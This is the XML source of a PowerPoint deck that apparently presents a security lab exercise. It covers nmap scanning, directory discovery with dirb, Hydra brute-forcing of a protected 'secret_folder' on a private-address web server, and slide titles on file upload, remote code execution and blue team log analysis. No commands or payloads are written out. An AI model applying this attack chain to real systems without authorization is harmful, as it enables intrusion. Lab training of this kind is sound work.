                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Data Exposure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="106337" y="1039297"/>
            <a:ext cx="2817607" cy="96481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25799" y="860508"/>
            <a:ext cx="3143945" cy="113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I have used ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a: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’ to scan for any open ports and services on network.</a:t>
            </a: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AU" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a: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 to find hidden folder URLs</a:t>
            </a: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Web Browser to explore on directory.</a:t>
            </a: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190903" y="663573"/>
            <a:ext cx="533372" cy="350482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046062" y="659823"/>
            <a:ext cx="643102" cy="365283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004482" y="1041488"/>
            <a:ext cx="5634925" cy="121657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2852928" y="860508"/>
            <a:ext cx="5634927" cy="144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I have found the IP address 192.168.1.105 was open on port 80,  from there I was able to access a secret_folder directory with important files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="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AU" sz="5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The Secret_folder directory was password protected and susceptible to brute force attack.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33C76-7543-3648-8EEE-4773E87D3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0" y="2182897"/>
            <a:ext cx="2855159" cy="28550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D0B8CE-2847-D948-B0C9-6E6A4842E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482" y="2295190"/>
            <a:ext cx="4886790" cy="1272078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;1115;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA3FF38-7297-A746-A8E0-DF3911709334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151081" y="4085915"/>
            <a:ext cx="805556" cy="456266"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0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Open port 80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;1119;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E720FCF-2F22-3842-B582-1D59FA309BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1464785" y="3596694"/>
            <a:ext cx="129470" cy="1243123"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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115;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB9EE34-227B-1B4C-8275-D3C6A356E6A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927848" y="2380247"/>
            <a:ext cx="805556" cy="456266"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0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birb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> found</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;1115;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF08BCB-D56A-354B-9279-73F281FAA167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062763" y="4050962"/>
            <a:ext cx="911366" cy="570572"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>beowser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1186695-E7BC-2E4F-97D8-3DFEA2791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481" y="3604393"/>
            <a:ext cx="5058281" cy="12211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29611" y="-187933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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Open Port 80 for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Data Exposure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="106337" y="1039297"/>
            <a:ext cx="2817607" cy="96481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25799" y="860508"/>
            <a:ext cx="3143945" cy="113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</a:p>
          <a:p>
            <a:pPr marL="1714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AU" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hyrda</a:t>
            </a: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 Used for Brute-force attack</a:t>
            </a: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190903" y="663573"/>
            <a:ext cx="533372" cy="350482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046062" y="659823"/>
            <a:ext cx="643102" cy="365283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004482" y="1041488"/>
            <a:ext cx="5634925" cy="121657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2852928" y="860508"/>
            <a:ext cx="5634927" cy="144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AU" sz="5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The Secret_folder directory was password protected and susceptible to brute force attack.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D1CD1-E513-8343-96BB-634E42EC8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03" y="2364379"/>
            <a:ext cx="78867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3845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4447</TotalTime>
  <Words>1828</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>246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Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Inconsolata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Open Port 80 for Data Exposure </vt:lpstr>
      <vt:lpstr>Exploitation: Open Port 80 for Data Exposure </vt:lpstr>
      <vt:lpstr>Exploitation: Unauthorized File Upload</vt:lpstr>
      <vt:lpstr>Exploitation: Unauthorized File Upload</vt:lpstr>
      <vt:lpstr>Exploitation: Remote Code Execution </vt:lpstr>
      <vt:lpstr>Exploitation: [Name of Third Vulnerability]</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory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Aziz Somani</cp:lastModifiedBy>
  <cp:revision>83</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-23T08:59:10Z</dcterms:modified>
</cp:coreProperties>
</file>